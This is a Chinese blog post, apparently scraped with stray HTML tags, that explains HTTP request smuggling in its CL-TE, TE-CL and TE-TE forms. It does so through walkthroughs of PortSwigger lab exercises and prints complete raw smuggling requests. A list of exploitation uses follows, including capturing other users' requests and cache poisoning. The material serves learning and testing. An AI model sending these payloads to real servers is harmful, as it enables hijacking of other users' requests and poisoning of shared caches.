<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    HTTP請求走私漏洞原理學習

    VSole2022-01-09 22:19:32

    0x00 簡介

    HTTP請求走私是一種干擾網站處理HTTP請求序列方式的技術。如下場景

    主要發生于前端服務器和后端服務器對客戶端傳入的數據理解不一致的情況。

    主要包含如下三種情況

    • CLTE:前端服務器使用 Content-Length頭,后端服務器使用 Transfer-Encoding頭
    • TECL:前端服務器使用 Transfer-Encoding標頭,后端服務器使用 Content-Length標頭。
    • TETE:前和后端服務器都支持 Transfer-Encoding 標頭,但是可以通過以某種方式來誘導其中一個服務器不處理它。

    0x01 CL-TE方式

    https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te

    題目要求構造一個GPOST的方法

    首先去掉repeater模塊的自動更新

    兩個http頭設置,Connection: keep-alive,Transfer-Encoding: chunked

    POST / HTTP/1.1
    Host: your-lab-id.web-security-academy.net
    Connection: keep-alive
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 6
    Transfer-Encoding: chunked
    0
    G 
    

    發送兩次該數據包,成功構造了一個GPOST方法

    0x02 TE-CL方式

    https://portswigger.net/web-security/request-smuggling/lab-basic-te-cl

    具體報文

    POST / HTTP/1.1
    Host: your-lab-id.web-security-academy.net
    Content-Type: application/x-www-form-urlencoded
    Content-length: 4
    Transfer-Encoding: chunked
    5c
    GPOST / HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 15
    x=1
    0
    

    需要注意上圖,最后的0d,0a。

    0x03 TE-TE方式

    https://portswigger.net/web-security/request-smuggling/lab-ofuscating-te-header

    具體報文

    POST / HTTP/1.1
    Host: acd21fad1f3a4c6e80a22a7a004f0077.web-security-academy.net
    Content-Type: application/x-www-form-urlencoded
    Content-length: 4
    Transfer-Encoding: chunked
    Transfer-encoding: cow
    5c
    GPOST / HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 15
    x=1
    0
    

    0x04 漏洞利用

    • 繞過前置服務器的安全限制
    • 獲取前置服務器修改過的請求字段
    • 獲取其他用戶的請求
    • 反射型 XSS 組合拳
    • 將 on-site 重定向變為開放式重定向
    • 緩存投毒
    • 緩存欺騙

    0x05 參考文章

    https://xz.aliyun.com/t/7501

    漏洞http請求
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    360漏洞云已復現HTTP Protocol Stack遠程代碼執行漏洞漏洞編號:CVE-2022-21907,漏洞威脅等級:嚴重,漏洞評分:9.8。
    dnslog.link,命令執行漏洞的時候搞起ls命令記錄起來很利索,比dnslog.cn快
    前言今天總結Android APP四大組件中Content Provider挖掘的知識,主要分為兩個部分,一部分是對Android Content Provider內容提供器的原理總結,另一部分便是對Android provider機制常見的一些漏洞總結,包括一些已知的漏洞方法,和一部分案例實踐。
    網站攻擊技術,一篇打包帶走!
    7月12日,Apache官方發布安全漏洞通告,修復了Tomcat中的一個HTTP請求走私漏洞。建議受影響用戶及時升級至安全版本進行防護,做好資產自查以及預防工作,以免遭受黑客攻擊。
    2021年12月21日,360漏洞云監測到Apache官網發布了安全更新,修復了多個安全漏洞。
    HTTP走私及變體總結
    2022-09-01 22:12:58
    HTTP請求走私是一種干擾網站處理從一個或多個用戶接收的HTTP請求序列的方式,用以繞過安全控制并獲得未經授權的訪問,執行惡意活動。Content-Length比實際消息長度長,請求將無響應直到超時。Transfer-Encoding: chunked代表數據以一系列分塊的形式進行發送.。Content-Length 首部在這種情況下應該不被發送。在HTTP協議消息頭中,使用Content-Type來表示請求和響應中的媒體類型信息。這個攻擊者便成功的利用了http請求走私漏洞
    2022年1月6日,360漏洞云團隊監測到 Red Hat發布安全公告,修復了多個存在于 OpenShift Container Platform中的中危漏洞
    Weblogic是美國Oracle公司出品的一個應用服務器(application server),確切的說是一個基于Java EE架構的中間件,是用于開發、集成、部署和管理大型分布式Web應用、網絡應用和 數據庫應用的Java應用服務器。 Weblogic將Java的動態功能和Java Enterprise標準的安全性引入大型網絡應用的開發、集成、部署和管理之中,是商業市場上主要的Java(J
    它的云解決方案包括云產品,數據中心產品和桌面產品等。它包括了 vCenter Server, ESXi 和 vSphere client,是整套虛擬化部署方案的總和。是 vSphere 中最重要的一個組件。而 vSphere client 有更加詳細的性能監控,批量更新接管所有 ESXi 系統版本。在 6.0 版本之后,官方已經取消了 C/S 架構的客戶端,轉而采用了 web 管理平臺,又被稱之為 vSphere web client。官方推薦將打包好的 Client 與 Server 應用部署在 VMware 自家的 Photon 系統下,其安裝包命名為:VMware vCenter Server Appliance,簡稱為:VCSA。
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类